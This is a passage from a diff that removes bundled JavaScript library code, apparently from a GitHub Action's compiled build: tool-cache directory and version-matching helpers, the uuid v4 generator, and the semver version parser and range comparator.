findFromManifest; -function _createExtractFolder(dest) { - return __awaiter(this, void 0, void 0, function* () { - if (!dest) { - // create a temp dir - dest = path.join(_getTempDirectory(), v4_1.default()); - } - yield io.mkdirP(dest); - return dest; - }); -} -function _createToolPath(tool, version, arch) { - return __awaiter(this, void 0, void 0, function* () { - const folderPath = path.join(_getCacheDirectory(), tool, semver.clean(version) || version, arch || ''); - core.debug(`destination ${folderPath}`); - const markerPath = `${folderPath}.complete`; - yield io.rmRF(folderPath); - yield io.rmRF(markerPath); - yield io.mkdirP(folderPath); - return folderPath; - }); -} -function _completeToolPath(tool, version, arch) { - const folderPath = path.join(_getCacheDirectory(), tool, semver.clean(version) || version, arch || ''); - const markerPath = `${folderPath}.complete`; - fs.writeFileSync(markerPath, ''); - core.debug('finished caching tool'); -} -/** - * Check if version string is explicit - * - * @param versionSpec version string to check - */ -function isExplicitVersion(versionSpec) { - const c = semver.clean(versionSpec) || ''; - core.debug(`isExplicit: ${c}`); - const valid = semver.valid(c) != null; - core.debug(`explicit? 
${valid}`); - return valid; -} -exports.isExplicitVersion = isExplicitVersion; -/** - * Get the highest satisfiying semantic version in `versions` which satisfies `versionSpec` - * - * @param versions array of versions to evaluate - * @param versionSpec semantic version spec to satisfy - */ -function evaluateVersions(versions, versionSpec) { - let version = ''; - core.debug(`evaluating ${versions.length} versions`); - versions = versions.sort((a, b) => { - if (semver.gt(a, b)) { - return 1; - } - return -1; - }); - for (let i = versions.length - 1; i >= 0; i--) { - const potential = versions[i]; - const satisfied = semver.satisfies(potential, versionSpec); - if (satisfied) { - version = potential; - break; - } - } - if (version) { - core.debug(`matched: ${version}`); - } - else { - core.debug('match not found'); - } - return version; -} -exports.evaluateVersions = evaluateVersions; -/** - * Gets RUNNER_TOOL_CACHE - */ -function _getCacheDirectory() { - const cacheDirectory = process.env['RUNNER_TOOL_CACHE'] || ''; - assert_1.ok(cacheDirectory, 'Expected RUNNER_TOOL_CACHE to be defined'); - return cacheDirectory; -} -/** - * Gets RUNNER_TEMP - */ -function _getTempDirectory() { - const tempDirectory = process.env['RUNNER_TEMP'] || ''; - assert_1.ok(tempDirectory, 'Expected RUNNER_TEMP to be defined'); - return tempDirectory; -} -/** - * Gets a global variable - */ -function _getGlobal(key, defaultValue) { - /* eslint-disable @typescript-eslint/no-explicit-any */ - const value = global[key]; - /* eslint-enable @typescript-eslint/no-explicit-any */ - return value !== undefined ? value : defaultValue; -} -/** - * Returns an array of unique values. - * @param values Values to make unique. 
- */ -function _unique(values) { - return Array.from(new Set(values)); -} -//# sourceMappingURL=tool-cache.js.map - -/***/ }), - -/***/ 7701: -/***/ ((module) => { - -/** - * Convert array of 16 byte values to UUID string format of the form: - * XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX - */ -var byteToHex = []; -for (var i = 0; i < 256; ++i) { - byteToHex[i] = (i + 0x100).toString(16).substr(1); -} - -function bytesToUuid(buf, offset) { - var i = offset || 0; - var bth = byteToHex; - // join used to fix memory issue caused by concatenation: https://bugs.chromium.org/p/v8/issues/detail?id=3175#c4 - return ([ - bth[buf[i++]], bth[buf[i++]], - bth[buf[i++]], bth[buf[i++]], '-', - bth[buf[i++]], bth[buf[i++]], '-', - bth[buf[i++]], bth[buf[i++]], '-', - bth[buf[i++]], bth[buf[i++]], '-', - bth[buf[i++]], bth[buf[i++]], - bth[buf[i++]], bth[buf[i++]], - bth[buf[i++]], bth[buf[i++]] - ]).join(''); -} - -module.exports = bytesToUuid; - - -/***/ }), - -/***/ 7269: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -// Unique ID creation requires a high quality random # generator. In node.js -// this is pretty straight-forward - we use the crypto API. - -var crypto = __nccwpck_require__(6113); - -module.exports = function nodeRNG() { - return crypto.randomBytes(16); -}; - - -/***/ }), - -/***/ 7468: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -var rng = __nccwpck_require__(7269); -var bytesToUuid = __nccwpck_require__(7701); - -function v4(options, buf, offset) { - var i = buf && offset || 0; - - if (typeof(options) == 'string') { - buf = options === 'binary' ? 
new Array(16) : null; - options = null; - } - options = options || {}; - - var rnds = options.random || (options.rng || rng)(); - - // Per 4.4, set bits for version and `clock_seq_hi_and_reserved` - rnds[6] = (rnds[6] & 0x0f) | 0x40; - rnds[8] = (rnds[8] & 0x3f) | 0x80; - - // Copy bytes to buffer, if provided - if (buf) { - for (var ii = 0; ii < 16; ++ii) { - buf[i + ii] = rnds[ii]; - } - } - - return buf || bytesToUuid(rnds); -} - -module.exports = v4; - - -/***/ }), - -/***/ 5911: -/***/ ((module, exports) => { - -exports = module.exports = SemVer - -var debug -/* istanbul ignore next */ -if (typeof process === 'object' && - process.env && - process.env.NODE_DEBUG && - /\bsemver\b/i.test(process.env.NODE_DEBUG)) { - debug = function () { - var args = Array.prototype.slice.call(arguments, 0) - args.unshift('SEMVER') - console.log.apply(console, args) - } -} else { - debug = function () {} -} - -// Note: this is the semver.org version of the spec that it implements -// Not necessarily the package version of this code. -exports.SEMVER_SPEC_VERSION = '2.0.0' - -var MAX_LENGTH = 256 -var MAX_SAFE_INTEGER = Number.MAX_SAFE_INTEGER || - /* istanbul ignore next */ 9007199254740991 - -// Max safe segment length for coercion. -var MAX_SAFE_COMPONENT_LENGTH = 16 - -var MAX_SAFE_BUILD_LENGTH = MAX_LENGTH - 6 - -// The actual regexps go on exports.re -var re = exports.re = [] -var safeRe = exports.safeRe = [] -var src = exports.src = [] -var t = exports.tokens = {} -var R = 0 - -function tok (n) { - t[n] = R++ -} - -var LETTERDASHNUMBER = '[a-zA-Z0-9-]' - -// Replace some greedy regex tokens to prevent regex dos issues. These regex are -// used internally via the safeRe object since all inputs in this library get -// normalized first to trim and collapse all extra whitespace. The original -// regexes are exported for userland consumption and lower level usage. 
A -// future breaking change could export the safer regex only with a note that -// all input should have extra whitespace removed. -var safeRegexReplacements = [ - ['\\s', 1], - ['\\d', MAX_LENGTH], - [LETTERDASHNUMBER, MAX_SAFE_BUILD_LENGTH], -] - -function makeSafeRe (value) { - for (var i = 0; i < safeRegexReplacements.length; i++) { - var token = safeRegexReplacements[i][0] - var max = safeRegexReplacements[i][1] - value = value - .split(token + '*').join(token + '{0,' + max + '}') - .split(token + '+').join(token + '{1,' + max + '}') - } - return value -} - -// The following Regular Expressions can be used for tokenizing, -// validating, and parsing SemVer version strings. - -// ## Numeric Identifier -// A single `0`, or a non-zero digit followed by zero or more digits. - -tok('NUMERICIDENTIFIER') -src[t.NUMERICIDENTIFIER] = '0|[1-9]\\d*' -tok('NUMERICIDENTIFIERLOOSE') -src[t.NUMERICIDENTIFIERLOOSE] = '\\d+' - -// ## Non-numeric Identifier -// Zero or more digits, followed by a letter or hyphen, and then zero or -// more letters, digits, or hyphens. - -tok('NONNUMERICIDENTIFIER') -src[t.NONNUMERICIDENTIFIER] = '\\d*[a-zA-Z-]' + LETTERDASHNUMBER + '*' - -// ## Main Version -// Three dot-separated numeric identifiers. - -tok('MAINVERSION') -src[t.MAINVERSION] = '(' + src[t.NUMERICIDENTIFIER] + ')\\.' + - '(' + src[t.NUMERICIDENTIFIER] + ')\\.' + - '(' + src[t.NUMERICIDENTIFIER] + ')' - -tok('MAINVERSIONLOOSE') -src[t.MAINVERSIONLOOSE] = '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')\\.' + - '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')\\.' + - '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')' - -// ## Pre-release Version Identifier -// A numeric identifier, or a non-numeric identifier. 
- -tok('PRERELEASEIDENTIFIER') -src[t.PRERELEASEIDENTIFIER] = '(?:' + src[t.NUMERICIDENTIFIER] + - '|' + src[t.NONNUMERICIDENTIFIER] + ')' - -tok('PRERELEASEIDENTIFIERLOOSE') -src[t.PRERELEASEIDENTIFIERLOOSE] = '(?:' + src[t.NUMERICIDENTIFIERLOOSE] + - '|' + src[t.NONNUMERICIDENTIFIER] + ')' - -// ## Pre-release Version -// Hyphen, followed by one or more dot-separated pre-release version -// identifiers. - -tok('PRERELEASE') -src[t.PRERELEASE] = '(?:-(' + src[t.PRERELEASEIDENTIFIER] + - '(?:\\.' + src[t.PRERELEASEIDENTIFIER] + ')*))' - -tok('PRERELEASELOOSE') -src[t.PRERELEASELOOSE] = '(?:-?(' + src[t.PRERELEASEIDENTIFIERLOOSE] + - '(?:\\.' + src[t.PRERELEASEIDENTIFIERLOOSE] + ')*))' - -// ## Build Metadata Identifier -// Any combination of digits, letters, or hyphens. - -tok('BUILDIDENTIFIER') -src[t.BUILDIDENTIFIER] = LETTERDASHNUMBER + '+' - -// ## Build Metadata -// Plus sign, followed by one or more period-separated build metadata -// identifiers. - -tok('BUILD') -src[t.BUILD] = '(?:\\+(' + src[t.BUILDIDENTIFIER] + - '(?:\\.' + src[t.BUILDIDENTIFIER] + ')*))' - -// ## Full Version String -// A main version, followed optionally by a pre-release version and -// build metadata. - -// Note that the only major, minor, patch, and pre-release sections of -// the version string are capturing groups. The build metadata is not a -// capturing group, because it should not ever be used in version -// comparison. - -tok('FULL') -tok('FULLPLAIN') -src[t.FULLPLAIN] = 'v?' + src[t.MAINVERSION] + - src[t.PRERELEASE] + '?' + - src[t.BUILD] + '?' - -src[t.FULL] = '^' + src[t.FULLPLAIN] + '$' - -// like full, but allows v1.2.3 and =1.2.3, which people do sometimes. -// also, 1.0.0alpha1 (prerelease without the hyphen) which is pretty -// common in the npm registry. -tok('LOOSEPLAIN') -src[t.LOOSEPLAIN] = '[v=\\s]*' + src[t.MAINVERSIONLOOSE] + - src[t.PRERELEASELOOSE] + '?' + - src[t.BUILD] + '?' 
- -tok('LOOSE') -src[t.LOOSE] = '^' + src[t.LOOSEPLAIN] + '$' - -tok('GTLT') -src[t.GTLT] = '((?:<|>)?=?)' - -// Something like "2.*" or "1.2.x". -// Note that "x.x" is a valid xRange identifer, meaning "any version" -// Only the first item is strictly required. -tok('XRANGEIDENTIFIERLOOSE') -src[t.XRANGEIDENTIFIERLOOSE] = src[t.NUMERICIDENTIFIERLOOSE] + '|x|X|\\*' -tok('XRANGEIDENTIFIER') -src[t.XRANGEIDENTIFIER] = src[t.NUMERICIDENTIFIER] + '|x|X|\\*' - -tok('XRANGEPLAIN') -src[t.XRANGEPLAIN] = '[v=\\s]*(' + src[t.XRANGEIDENTIFIER] + ')' + - '(?:\\.(' + src[t.XRANGEIDENTIFIER] + ')' + - '(?:\\.(' + src[t.XRANGEIDENTIFIER] + ')' + - '(?:' + src[t.PRERELEASE] + ')?' + - src[t.BUILD] + '?' + - ')?)?' - -tok('XRANGEPLAINLOOSE') -src[t.XRANGEPLAINLOOSE] = '[v=\\s]*(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' + - '(?:\\.(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' + - '(?:\\.(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' + - '(?:' + src[t.PRERELEASELOOSE] + ')?' + - src[t.BUILD] + '?' + - ')?)?' - -tok('XRANGE') -src[t.XRANGE] = '^' + src[t.GTLT] + '\\s*' + src[t.XRANGEPLAIN] + '$' -tok('XRANGELOOSE') -src[t.XRANGELOOSE] = '^' + src[t.GTLT] + '\\s*' + src[t.XRANGEPLAINLOOSE] + '$' - -// Coercion. -// Extract anything that could conceivably be a part of a valid semver -tok('COERCE') -src[t.COERCE] = '(^|[^\\d])' + - '(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '})' + - '(?:\\.(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '}))?' + - '(?:\\.(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '}))?' + - '(?:$|[^\\d])' -tok('COERCERTL') -re[t.COERCERTL] = new RegExp(src[t.COERCE], 'g') -safeRe[t.COERCERTL] = new RegExp(makeSafeRe(src[t.COERCE]), 'g') - -// Tilde ranges. 
-// Meaning is "reasonably at or greater than" -tok('LONETILDE') -src[t.LONETILDE] = '(?:~>?)' - -tok('TILDETRIM') -src[t.TILDETRIM] = '(\\s*)' + src[t.LONETILDE] + '\\s+' -re[t.TILDETRIM] = new RegExp(src[t.TILDETRIM], 'g') -safeRe[t.TILDETRIM] = new RegExp(makeSafeRe(src[t.TILDETRIM]), 'g') -var tildeTrimReplace = '$1~' - -tok('TILDE') -src[t.TILDE] = '^' + src[t.LONETILDE] + src[t.XRANGEPLAIN] + '$' -tok('TILDELOOSE') -src[t.TILDELOOSE] = '^' + src[t.LONETILDE] + src[t.XRANGEPLAINLOOSE] + '$' - -// Caret ranges. -// Meaning is "at least and backwards compatible with" -tok('LONECARET') -src[t.LONECARET] = '(?:\\^)' - -tok('CARETTRIM') -src[t.CARETTRIM] = '(\\s*)' + src[t.LONECARET] + '\\s+' -re[t.CARETTRIM] = new RegExp(src[t.CARETTRIM], 'g') -safeRe[t.CARETTRIM] = new RegExp(makeSafeRe(src[t.CARETTRIM]), 'g') -var caretTrimReplace = '$1^' - -tok('CARET') -src[t.CARET] = '^' + src[t.LONECARET] + src[t.XRANGEPLAIN] + '$' -tok('CARETLOOSE') -src[t.CARETLOOSE] = '^' + src[t.LONECARET] + src[t.XRANGEPLAINLOOSE] + '$' - -// A simple gt/lt/eq thing, or just "" to indicate "any version" -tok('COMPARATORLOOSE') -src[t.COMPARATORLOOSE] = '^' + src[t.GTLT] + '\\s*(' + src[t.LOOSEPLAIN] + ')$|^$' -tok('COMPARATOR') -src[t.COMPARATOR] = '^' + src[t.GTLT] + '\\s*(' + src[t.FULLPLAIN] + ')$|^$' - -// An expression to strip any whitespace between the gtlt and the thing -// it modifies, so that `> 1.2.3` ==> `>1.2.3` -tok('COMPARATORTRIM') -src[t.COMPARATORTRIM] = '(\\s*)' + src[t.GTLT] + - '\\s*(' + src[t.LOOSEPLAIN] + '|' + src[t.XRANGEPLAIN] + ')' - -// this one has to use the /g flag -re[t.COMPARATORTRIM] = new RegExp(src[t.COMPARATORTRIM], 'g') -safeRe[t.COMPARATORTRIM] = new RegExp(makeSafeRe(src[t.COMPARATORTRIM]), 'g') -var comparatorTrimReplace = '$1$2$3' - -// Something like `1.2.3 - 1.2.4` -// Note that these all use the loose form, because they'll be -// checked against either the strict or loose comparator form -// later. 
-tok('HYPHENRANGE') -src[t.HYPHENRANGE] = '^\\s*(' + src[t.XRANGEPLAIN] + ')' + - '\\s+-\\s+' + - '(' + src[t.XRANGEPLAIN] + ')' + - '\\s*$' - -tok('HYPHENRANGELOOSE') -src[t.HYPHENRANGELOOSE] = '^\\s*(' + src[t.XRANGEPLAINLOOSE] + ')' + - '\\s+-\\s+' + - '(' + src[t.XRANGEPLAINLOOSE] + ')' + - '\\s*$' - -// Star ranges basically just allow anything at all. -tok('STAR') -src[t.STAR] = '(<|>)?=?\\s*\\*' - -// Compile to actual regexp objects. -// All are flag-free, unless they were created above with a flag. -for (var i = 0; i < R; i++) { - debug(i, src[i]) - if (!re[i]) { - re[i] = new RegExp(src[i]) - - // Replace all greedy whitespace to prevent regex dos issues. These regex are - // used internally via the safeRe object since all inputs in this library get - // normalized first to trim and collapse all extra whitespace. The original - // regexes are exported for userland consumption and lower level usage. A - // future breaking change could export the safer regex only with a note that - // all input should have extra whitespace removed. - safeRe[i] = new RegExp(makeSafeRe(src[i])) - } -} - -exports.parse = parse -function parse (version, options) { - if (!options || typeof options !== 'object') { - options = { - loose: !!options, - includePrerelease: false - } - } - - if (version instanceof SemVer) { - return version - } - - if (typeof version !== 'string') { - return null - } - - if (version.length > MAX_LENGTH) { - return null - } - - var r = options.loose ? safeRe[t.LOOSE] : safeRe[t.FULL] - if (!r.test(version)) { - return null - } - - try { - return new SemVer(version, options) - } catch (er) { - return null - } -} - -exports.valid = valid -function valid (version, options) { - var v = parse(version, options) - return v ? v.version : null -} - -exports.clean = clean -function clean (version, options) { - var s = parse(version.trim().replace(/^[=v]+/, ''), options) - return s ? 
s.version : null -} - -exports.SemVer = SemVer - -function SemVer (version, options) { - if (!options || typeof options !== 'object') { - options = { - loose: !!options, - includePrerelease: false - } - } - if (version instanceof SemVer) { - if (version.loose === options.loose) { - return version - } else { - version = version.version - } - } else if (typeof version !== 'string') { - throw new TypeError('Invalid Version: ' + version) - } - - if (version.length > MAX_LENGTH) { - throw new TypeError('version is longer than ' + MAX_LENGTH + ' characters') - } - - if (!(this instanceof SemVer)) { - return new SemVer(version, options) - } - - debug('SemVer', version, options) - this.options = options - this.loose = !!options.loose - - var m = version.trim().match(options.loose ? safeRe[t.LOOSE] : safeRe[t.FULL]) - - if (!m) { - throw new TypeError('Invalid Version: ' + version) - } - - this.raw = version - - // these are actually numbers - this.major = +m[1] - this.minor = +m[2] - this.patch = +m[3] - - if (this.major > MAX_SAFE_INTEGER || this.major < 0) { - throw new TypeError('Invalid major version') - } - - if (this.minor > MAX_SAFE_INTEGER || this.minor < 0) { - throw new TypeError('Invalid minor version') - } - - if (this.patch > MAX_SAFE_INTEGER || this.patch < 0) { - throw new TypeError('Invalid patch version') - } - - // numberify any prerelease numeric ids - if (!m[4]) { - this.prerelease = [] - } else { - this.prerelease = m[4].split('.').map(function (id) { - if (/^[0-9]+$/.test(id)) { - var num = +id - if (num >= 0 && num < MAX_SAFE_INTEGER) { - return num - } - } - return id - }) - } - - this.build = m[5] ? m[5].split('.') : [] - this.format() -} - -SemVer.prototype.format = function () { - this.version = this.major + '.' + this.minor + '.' 
+ this.patch - if (this.prerelease.length) { - this.version += '-' + this.prerelease.join('.') - } - return this.version -} - -SemVer.prototype.toString = function () { - return this.version -} - -SemVer.prototype.compare = function (other) { - debug('SemVer.compare', this.version, this.options, other) - if (!(other instanceof SemVer)) { - other = new SemVer(other, this.options) - } - - return this.compareMain(other) || this.comparePre(other) -} - -SemVer.prototype.compareMain = function (other) { - if (!(other instanceof SemVer)) { - other = new SemVer(other, this.options) - } - - return compareIdentifiers(this.major, other.major) || - compareIdentifiers(this.minor, other.minor) || - compareIdentifiers(this.patch, other.patch) -} - -SemVer.prototype.comparePre = function (other) { - if (!(other instanceof SemVer)) { - other = new SemVer(other, this.options) - } - - // NOT having a prerelease is > having one - if (this.prerelease.length && !other.prerelease.length) { - return -1 - } else if (!this.prerelease.length && other.prerelease.length) { - return 1 - } else if (!this.prerelease.length && !other.prerelease.length) { - return 0 - } - - var i = 0 - do { - var a = this.prerelease[i] - var b = other.prerelease[i] - debug('prerelease compare', i, a, b) - if (a === undefined && b === undefined) { - return 0 - } else if (b === undefined) { - return 1 - } else if (a === undefined) { - return -1 - } else if (a === b) { - continue - } else { - return compareIdentifiers(a, b) - } - } while (++i) -} - -SemVer.prototype.compareBuild = function (other) { - if (!(other instanceof SemVer)) { - other = new SemVer(other, this.options) - } - - var i = 0 - do { - var a = this.build[i] - var b = other.build[i] - debug('prerelease compare', i, a, b) - if (a === undefined && b === undefined) { - return 0 - } else if (b === undefined) { - return 1 - } else if (a === undefined) { - return -1 - } else if (a === b) { - continue - } else { - return compareIdentifiers(a, b) - } - } while 
(++i) -} - -// preminor will bump the version up to the next minor release, and immediately -// down to pre-release. premajor and prepatch work the same way. -SemVer.prototype.inc = function (release, identifier) { - switch (release) { - case 'premajor': - this.prerelease.length = 0 - this.patch = 0 - this.minor = 0 - this.major++ - this.inc('pre', identifier) - break - case 'preminor': - this.prerelease.length = 0 - this.patch = 0 - this.minor++ - this.inc('pre', identifier) - break - case 'prepatch': - // If this is already a prerelease, it will bump to the next version - // drop any prereleases that might already exist, since they are not - // relevant at this point. - this.prerelease.length = 0 - this.inc('patch', identifier) - this.inc('pre', identifier) - break - // If the input is a non-prerelease version, this acts the same as - // prepatch. - case 'prerelease': - if (this.prerelease.length === 0) { - this.inc('patch', identifier) - } - this.inc('pre', identifier) - break - - case 'major': - // If this is a pre-major version, bump up to the same major version. - // Otherwise increment major. - // 1.0.0-5 bumps to 1.0.0 - // 1.1.0 bumps to 2.0.0 - if (this.minor !== 0 || - this.patch !== 0 || - this.prerelease.length === 0) { - this.major++ - } - this.minor = 0 - this.patch = 0 - this.prerelease = [] - break - case 'minor': - // If this is a pre-minor version, bump up to the same minor version. - // Otherwise increment minor. - // 1.2.0-5 bumps to 1.2.0 - // 1.2.1 bumps to 1.3.0 - if (this.patch !== 0 || this.prerelease.length === 0) { - this.minor++ - } - this.patch = 0 - this.prerelease = [] - break - case 'patch': - // If this is not a pre-release version, it will increment the patch. - // If it is a pre-release it will bump up to the same patch version. - // 1.2.0-5 patches to 1.2.0 - // 1.2.0 patches to 1.2.1 - if (this.prerelease.length === 0) { - this.patch++ - } - this.prerelease = [] - break - // This probably shouldn't be used publicly. 
- // 1.0.0 "pre" would become 1.0.0-0 which is the wrong direction. - case 'pre': - if (this.prerelease.length === 0) { - this.prerelease = [0] - } else { - var i = this.prerelease.length - while (--i >= 0) { - if (typeof this.prerelease[i] === 'number') { - this.prerelease[i]++ - i = -2 - } - } - if (i === -1) { - // didn't increment anything - this.prerelease.push(0) - } - } - if (identifier) { - // 1.2.0-beta.1 bumps to 1.2.0-beta.2, - // 1.2.0-beta.fooblz or 1.2.0-beta bumps to 1.2.0-beta.0 - if (this.prerelease[0] === identifier) { - if (isNaN(this.prerelease[1])) { - this.prerelease = [identifier, 0] - } - } else { - this.prerelease = [identifier, 0] - } - } - break - - default: - throw new Error('invalid increment argument: ' + release) - } - this.format() - this.raw = this.version - return this -} - -exports.inc = inc -function inc (version, release, loose, identifier) { - if (typeof (loose) === 'string') { - identifier = loose - loose = undefined - } - - try { - return new SemVer(version, loose).inc(release, identifier).version - } catch (er) { - return null - } -} - -exports.diff = diff -function diff (version1, version2) { - if (eq(version1, version2)) { - return null - } else { - var v1 = parse(version1) - var v2 = parse(version2) - var prefix = '' - if (v1.prerelease.length || v2.prerelease.length) { - prefix = 'pre' - var defaultResult = 'prerelease' - } - for (var key in v1) { - if (key === 'major' || key === 'minor' || key === 'patch') { - if (v1[key] !== v2[key]) { - return prefix + key - } - } - } - return defaultResult // may be undefined - } -} - -exports.compareIdentifiers = compareIdentifiers - -var numeric = /^[0-9]+$/ -function compareIdentifiers (a, b) { - var anum = numeric.test(a) - var bnum = numeric.test(b) - - if (anum && bnum) { - a = +a - b = +b - } - - return a === b ? 0 - : (anum && !bnum) ? -1 - : (bnum && !anum) ? 1 - : a < b ? 
-1 - : 1 -} - -exports.rcompareIdentifiers = rcompareIdentifiers -function rcompareIdentifiers (a, b) { - return compareIdentifiers(b, a) -} - -exports.major = major -function major (a, loose) { - return new SemVer(a, loose).major -} - -exports.minor = minor -function minor (a, loose) { - return new SemVer(a, loose).minor -} - -exports.patch = patch -function patch (a, loose) { - return new SemVer(a, loose).patch -} - -exports.compare = compare -function compare (a, b, loose) { - return new SemVer(a, loose).compare(new SemVer(b, loose)) -} - -exports.compareLoose = compareLoose -function compareLoose (a, b) { - return compare(a, b, true) -} - -exports.compareBuild = compareBuild -function compareBuild (a, b, loose) { - var versionA = new SemVer(a, loose) - var versionB = new SemVer(b, loose) - return versionA.compare(versionB) || versionA.compareBuild(versionB) -} - -exports.rcompare = rcompare -function rcompare (a, b, loose) { - return compare(b, a, loose) -} - -exports.sort = sort -function sort (list, loose) { - return list.sort(function (a, b) { - return exports.compareBuild(a, b, loose) - }) -} - -exports.rsort = rsort -function rsort (list, loose) { - return list.sort(function (a, b) { - return exports.compareBuild(b, a, loose) - }) -} - -exports.gt = gt -function gt (a, b, loose) { - return compare(a, b, loose) > 0 -} - -exports.lt = lt -function lt (a, b, loose) { - return compare(a, b, loose) < 0 -} - -exports.eq = eq -function eq (a, b, loose) { - return compare(a, b, loose) === 0 -} - -exports.neq = neq -function neq (a, b, loose) { - return compare(a, b, loose) !== 0 -} - -exports.gte = gte -function gte (a, b, loose) { - return compare(a, b, loose) >= 0 -} - -exports.lte = lte -function lte (a, b, loose) { - return compare(a, b, loose) <= 0 -} - -exports.cmp = cmp -function cmp (a, op, b, loose) { - switch (op) { - case '===': - if (typeof a === 'object') - a = a.version - if (typeof b === 'object') - b = b.version - return a === b - - case '!==': - 
if (typeof a === 'object') - a = a.version - if (typeof b === 'object') - b = b.version - return a !== b - - case '': - case '=': - case '==': - return eq(a, b, loose) - - case '!=': - return neq(a, b, loose) - - case '>': - return gt(a, b, loose) - - case '>=': - return gte(a, b, loose) - - case '<': - return lt(a, b, loose) - - case '<=': - return lte(a, b, loose) - - default: - throw new TypeError('Invalid operator: ' + op) - } -} - -exports.Comparator = Comparator -function Comparator (comp, options) { - if (!options || typeof options !== 'object') { - options = { - loose: !!options, - includePrerelease: false - } - } - - if (comp instanceof Comparator) { - if (comp.loose === !!options.loose) { - return comp - } else { - comp = comp.value - } - } - - if (!(this instanceof Comparator)) { - return new Comparator(comp, options) - } - - comp = comp.trim().split(/\s+/).join(' ') - debug('comparator', comp, options) - this.options = options - this.loose = !!options.loose - this.parse(comp) - - if (this.semver === ANY) { - this.value = '' - } else { - this.value = this.operator + this.semver.version - } - - debug('comp', this) -} - -var ANY = {} -Comparator.prototype.parse = function (comp) { - var r = this.options.loose ? safeRe[t.COMPARATORLOOSE] : safeRe[t.COMPARATOR] - var m = comp.match(r) - - if (!m) { - throw new TypeError('Invalid comparator: ' + comp) - } - - this.operator = m[1] !== undefined ? m[1] : '' - if (this.operator === '=') { - this.operator = '' - } - - // if it literally is just '>' or '' then allow anything. 
- if (!m[2]) { - this.semver = ANY - } else { - this.semver = new SemVer(m[2], this.options.loose) - } -} - -Comparator.prototype.toString = function () { - return this.value -} - -Comparator.prototype.test = function (version) { - debug('Comparator.test', version, this.options.loose) - - if (this.semver === ANY || version === ANY) { - return true - } - - if (typeof version === 'string') { - try { - version = new SemVer(version, this.options) - } catch (er) { - return false - } - } - - return cmp(version, this.operator, this.semver, this.options) -} - -Comparator.prototype.intersects = function (comp, options) { - if (!(comp instanceof Comparator)) { - throw new TypeError('a Comparator is required') - } - - if (!options || typeof options !== 'object') { - options = { - loose: !!options, - includePrerelease: false - } - } - - var rangeTmp - - if (this.operator === '') { - if (this.value === '') { - return true - } - rangeTmp = new Range(comp.value, options) - return satisfies(this.value, rangeTmp, options) - } else if (comp.operator === '') { - if (comp.value === '') { - return true - } - rangeTmp = new Range(this.value, options) - return satisfies(comp.semver, rangeTmp, options) - } - - var sameDirectionIncreasing = - (this.operator === '>=' || this.operator === '>') && - (comp.operator === '>=' || comp.operator === '>') - var sameDirectionDecreasing = - (this.operator === '<=' || this.operator === '<') && - (comp.operator === '<=' || comp.operator === '<') - var sameSemVer = this.semver.version === comp.semver.version - var differentDirectionsInclusive = - (this.operator === '>=' || this.operator === '<=') && - (comp.operator === '>=' || comp.operator === '<=') - var oppositeDirectionsLessThan = - cmp(this.semver, '<', comp.semver, options) && - ((this.operator === '>=' || this.operator === '>') && - (comp.operator === '<=' || comp.operator === '<')) - var oppositeDirectionsGreaterThan = - cmp(this.semver, '>', comp.semver, options) && - ((this.operator === '<=' 
|| this.operator === '<') && - (comp.operator === '>=' || comp.operator === '>')) - - return sameDirectionIncreasing || sameDirectionDecreasing || - (sameSemVer && differentDirectionsInclusive) || - oppositeDirectionsLessThan || oppositeDirectionsGreaterThan -} - -exports.Range = Range -function Range (range, options) { - if (!options || typeof options !== 'object') { - options = { - loose: !!options, - includePrerelease: false - } - } - - if (range instanceof Range) { - if (range.loose === !!options.loose && - range.includePrerelease === !!options.includePrerelease) { - return range - } else { - return new Range(range.raw, options) - } - } - - if (range instanceof Comparator) { - return new Range(range.value, options) - } - - if (!(this instanceof Range)) { - return new Range(range, options) - } - - this.options = options - this.loose = !!options.loose - this.includePrerelease = !!options.includePrerelease - - // First reduce all whitespace as much as possible so we do not have to rely - // on potentially slow regexes like \s*. This is then stored and used for - // future error messages as well. - this.raw = range - .trim() - .split(/\s+/) - .join(' ') - - // First, split based on boolean or || - this.set = this.raw.split('||').map(function (range) { - return this.parseRange(range.trim()) - }, this).filter(function (c) { - // throw out any that are not relevant for whatever reason - return c.length - }) - - if (!this.set.length) { - throw new TypeError('Invalid SemVer Range: ' + this.raw) - } - - this.format() -} - -Range.prototype.format = function () { - this.range = this.set.map(function (comps) { - return comps.join(' ').trim() - }).join('||').trim() - return this.range -} - -Range.prototype.toString = function () { - return this.range -} - -Range.prototype.parseRange = function (range) { - var loose = this.options.loose - // `1.2.3 - 1.2.4` => `>=1.2.3 <=1.2.4` - var hr = loose ? 
safeRe[t.HYPHENRANGELOOSE] : safeRe[t.HYPHENRANGE] - range = range.replace(hr, hyphenReplace) - debug('hyphen replace', range) - // `> 1.2.3 < 1.2.5` => `>1.2.3 <1.2.5` - range = range.replace(safeRe[t.COMPARATORTRIM], comparatorTrimReplace) - debug('comparator trim', range, safeRe[t.COMPARATORTRIM]) - - // `~ 1.2.3` => `~1.2.3` - range = range.replace(safeRe[t.TILDETRIM], tildeTrimReplace) - - // `^ 1.2.3` => `^1.2.3` - range = range.replace(safeRe[t.CARETTRIM], caretTrimReplace) - - // normalize spaces - range = range.split(/\s+/).join(' ') - - // At this point, the range is completely trimmed and - // ready to be split into comparators. - - var compRe = loose ? safeRe[t.COMPARATORLOOSE] : safeRe[t.COMPARATOR] - var set = range.split(' ').map(function (comp) { - return parseComparator(comp, this.options) - }, this).join(' ').split(/\s+/) - if (this.options.loose) { - // in loose mode, throw out any that are not valid comparators - set = set.filter(function (comp) { - return !!comp.match(compRe) - }) - } - set = set.map(function (comp) { - return new Comparator(comp, this.options) - }, this) - - return set -} - -Range.prototype.intersects = function (range, options) { - if (!(range instanceof Range)) { - throw new TypeError('a Range is required') - } - - return this.set.some(function (thisComparators) { - return ( - isSatisfiable(thisComparators, options) && - range.set.some(function (rangeComparators) { - return ( - isSatisfiable(rangeComparators, options) && - thisComparators.every(function (thisComparator) { - return rangeComparators.every(function 